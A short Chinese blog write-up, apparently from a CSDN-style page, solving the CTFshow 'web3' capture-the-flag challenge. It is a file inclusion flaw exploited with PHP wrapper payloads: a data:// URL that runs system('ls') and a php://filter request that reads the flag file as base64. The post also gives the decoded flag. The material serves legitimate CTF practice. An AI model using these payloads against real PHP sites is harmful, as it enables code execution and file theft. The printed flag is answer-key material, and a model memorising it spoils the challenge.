0
点赞
收藏
分享

微信扫一扫

CTFshow WEB web3

未定义变量 2022-04-19 阅读 56
web安全

CTFshow WEB web3


  • 进入环境,题目提示存在文件包含漏洞

    <?php include($_GET['url']);?>
    
  • 使用PHP伪协议

    ?url=data://text/plain,<?php% system('ls');?>
    
    ctf_go_go_go index.php
    
    ?url=php://filter/convert.base64-encode/resource=ctf_go_go_go
    
    Y3Rmc2hvd3swNjNmNWZkYS0wZmU3LTQxOWYtYWFmMi01ZDZkMjY1OGJiZTJ9Cg==
    

    base64解密

    ctfshow{063f5fda-0fe7-419f-aaf2-5d6d2658bbe2}
    
举报

相关推荐

0 条评论